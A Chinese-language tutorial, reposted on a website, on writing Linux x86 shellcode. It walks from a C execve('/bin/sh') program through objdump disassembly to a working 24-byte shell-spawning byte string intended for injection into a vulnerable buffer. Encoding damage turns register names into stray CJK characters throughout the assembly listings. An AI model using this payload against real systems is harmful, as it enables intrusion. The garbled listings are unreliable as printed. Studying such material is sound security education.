如何執(zhí)行 /bin/sh?
在C中，spawn出一個(gè)shell的代碼可能象這樣：
shell.c :
#include
void main()
{
char *shell[2];
shell[0] = "/bin/sh";
shell[1] = NULL;
execve(shell[0], shell, NULL);
}
[murat@victim murat]$ make shell
cc -W -Wall -pedantic -g shell.c-o shell
[murat@victim murat]$ ./shell
bash$
如果你看execve的man說明頁($man 2 execve)，你將看到execve要求一個(gè)將要執(zhí)行的文件名的指針，一個(gè)NULL終止的參數(shù)數(shù)組，和一個(gè)可以為NULL的環(huán)境指針。如果你編譯運(yùn)行了這個(gè)輸出的二進(jìn)制文件，你將看到你spawn出了一個(gè)新的shell。
目前為止一切順利……但是我們不能用這種方式spawn出一個(gè)shell，是嗎？我們?nèi)绾文苡眠@種方式把這個(gè)代碼放到漏洞程序里去呢？我們不能！
這給我們造成了一個(gè)新問題：我們?nèi)绾文馨盐覀兊墓舸a傳給漏洞程序？我們將需要在易受攻擊的緩沖區(qū)傳遞我們的代碼，它很有可能是一段shell代碼。為了實(shí)現(xiàn)這個(gè)目標(biāo)，我們必須能夠把我們的shell代碼用一個(gè)字符串表示。
因此，我們將列出所有的來spawn出一個(gè)shell的匯編指令，得到它們的運(yùn)算碼，把它們一個(gè)一個(gè)列出來，然后把它們作為一個(gè)shell生成串組裝起來。
首先，讓我們看看上面的代碼(shell.c)在匯編中是什么樣子。讓我們靜態(tài)編譯程序(這個(gè)方法，execve系統(tǒng)調(diào)用也將被反匯編)然后看：
[murat@victim murat]$ gcc -static -g -o shell shell.c
[murat@victim murat]$ objdump -d shell | grep \: -A 12
0804ca10 :
804ca10: 53 pushl 離
804ca11: 8b 54 24 10 movl0x10(%esp,1),韝
804ca15: 8b 4c 24 0c movl0xc(%esp,1),靫
804ca19: 8b 5c 24 08 movl0x8(%esp,1),離
804ca1d: b8 0b 00 00 00 movl$0xb,陎
804ca22: cd 80 int $0x80
804ca24: 5b popl離
804ca25: 3d 01 f0 ff ff cmpl$0xfffff001,陎
804ca2a: 0f 83 00 02 00 jae 804cc30
804ca2f: 00
804ca30: c3 ret
804ca31: 90 nop
[murat@victim murat]$ 讓我們一步一步地分析這個(gè)系統(tǒng)調(diào)用：
記住，在我們的main()函數(shù)里，我們寫了代碼：
execve(shell[0], shell, NULL)
我們傳遞了：
·字符串”/bin/sh”的地址
·NULL結(jié)尾數(shù)組的地址
·NULL(實(shí)際上它是環(huán)境地址)
此處，在main里面：
[murat@victim murat]$ objdump -d shell | grep \: -A 17
08048124 :
8048124: 55 pushl 雙
8048125: 89 e5 movl%esp,雙
8048127: 83 ec 08 subl$0x8,%esp
804812a: c7 45 f8 ac 92 movl$0x80592ac,0xfffffff8(雙)
804812f: 05 08
8048131: c7 45 fc 00 00 movl$0x0,0xfffffffc(雙)
8048136: 00 00
8048138: 6a 00 pushl $0x0
804813a: 8d 45 f8 leal0xfffffff8(雙),陎
804813d: 50 pushl 陎
804813e: 8b 45 f8 movl0xfffffff8(雙),陎
8048141: 50 pushl 陎
8048142: e8 c9 48 00 00 call804ca10
8048147: 83 c4 0c addl$0xc,%esp
804814a: c9 leave
804814b: c3 ret
804814c: 90 nop
在調(diào)用execve(call 804ca10 )之前，我們反序把這些參數(shù)推入到堆棧中。
因此，如果我們回到__execve：
我們拷貝NULL字節(jié)到EDX寄存器，
804ca11: 8b 54 24 10 movl0x10(%esp,1),韝
我們拷貝以NULL結(jié)尾數(shù)組的地址到ECX寄存器，
804ca15: 8b 4c 24 0c movl0xc(%esp,1),靫
我們拷貝字符串"/bin/sh"的地址到EBX寄存器
804ca19: 8b 5c 24 08 movl0x8(%esp,1),離
我們?yōu)閑xecve拷貝系統(tǒng)索引,即11(oxb)到EAX寄存器:
804ca1d: b8 0b 00 00 00 movl$0xb,陎
接著變成核模式:
804ca22: cd 80 int $0x80
我們需要的全部就是這么多了。然而，這里還有一些問題。我們不能準(zhǔn)確地知道NULL結(jié)束數(shù)組和”/bin/sh”字符串的地址。那么，這個(gè)怎么樣？：
xorl 陎, 陎
pushl 陎
pushl$0x68732f2f
pushl$0x6e69622f
movl %esp,離
pushl陎
pushl離
movl %esp,靫
cdql
movb $0x0b,%al
int $0x80
讓我解釋一下上面的指令：
如果你進(jìn)行自身異或，你得到0，等同于NULL。這里，我們在EAX寄存器中得到一個(gè)NULL。
xorl 陎, 陎
接著我們把NULL推入堆棧：
pushl 陎
我們把字符串”//sh”推入堆棧，
2f is /
2f is /
73 is s
68 is h
pushl$0x68732f2f 我們把字符串”/bin”推入堆棧：
2f is /
62 is b
69 is i
6e is n
pushl$0x6e69622f
可以猜想，現(xiàn)在堆棧指針地址就象我們的NULL結(jié)尾字符串”/bin/sh”的地址。因?yàn)椋瑥闹赶驐ｍ數(shù)闹羔橀_始，我們有了一個(gè)NULL結(jié)尾的字符串?dāng)?shù)組。因此，我們拷貝堆棧指針到EBX寄存器。這樣，我們就已經(jīng)把”/bin/sh”的地址放到EBX寄存器中了。
movl %esp,離
接著我們需要用NULL結(jié)尾的數(shù)組地址設(shè)置ECX。為此，我們在我們的堆棧中創(chuàng)造了一個(gè)NULL結(jié)尾的數(shù)組，與上面那個(gè)很像：首先我們PUSH一個(gè)NULL。我們不能PUSH NULL，但是我們能PUSH值為NULL的東西，回顧我們異或EAX寄存器在那我們得到了NULL，因此讓我們PUSH EAX來在堆棧中得到一個(gè)NULL。
pushl 陎
接著，我們PUSH我們的字符串的地址到堆棧，這等同于shell[0]：
pushl 離
現(xiàn)在我們有一個(gè)NULL結(jié)尾數(shù)組的指針，我們能夠在ECX中保存它的地址：
movl %esp,靫
我們還需要其它什么呢？一個(gè)在EDX寄存器中的NULL。我們能movl 陎, 韝，但是我們能用一個(gè)短的指令完成這個(gè)操作：cdq。這個(gè)指令是把EAX中的符號(hào)位擴(kuò)展到EDX。：
cdql
我們設(shè)定EAX 為0xb，這是系統(tǒng)調(diào)用表中的系統(tǒng)調(diào)用id。
movb $0x0b,%al
接著，我們轉(zhuǎn)換到核模式：
int 0x80
之后，我們進(jìn)到核模式，內(nèi)核將調(diào)用exec函數(shù)執(zhí)行我們指示給它的：/bin/sh 這樣我們將進(jìn)入一個(gè)交互shell…… 因此，在講了這么多以后，我們所要做的全部就是把這些匯編指令轉(zhuǎn)換到一個(gè)字符串中。因此，讓我們得到這些十六進(jìn)制運(yùn)賽碼然后匯編我們的攻擊代碼：
sc.c :
char newsc[]= /* 24 bytes */
"\x31\xc0" /* xorl 陎,陎 */
"\x50" /* pushl陎 */
"\x68""//sh" /* pushl$0x68732f2f*/
"\x68""/bin" /* pushl$0x6e69622f*/
"\x89\xe3" /* movl %esp,離 */
"\x50" /* pushl陎 */
"\x53" /* pushl離 */
"\x89\xe1" /* movl %esp,靫 */
"\x99" /* cdql*/
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80*/
;
main()
{
}
[murat@victim newsc]$ gcc -g -o sc sc.c
[murat@victim newsc]$ objdump -D sc | grep \ -A13
080494b0 :
80494b0: 31 c0 xorl陎,陎
80494b2: 50 pushl 陎
80494b3: 68 2f 2f 73 68 pushl $0x68732f2f
80494b8: 68 2f 62 69 6e pushl $0x6e69622f
80494bd: 89 e3 movl%esp,離
80494bf: 50 pushl 陎
80494c0: 53 pushl 離
80494c1: 89 e1 movl%esp,靫
80494c3: 99 cltd
80494c4: b0 0b movb$0xb,%al
80494c6: cd 80 int $0x80
80494c8: 00 00 addb%al,(陎)
...
[murat@victim newsc]$
在上面的圖中，第一行是指令內(nèi)存地址，接下面的行是匯編指令的運(yùn)算碼，這也是我們興趣所在，而最后一行是與運(yùn)算碼相關(guān)的匯編指令。

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。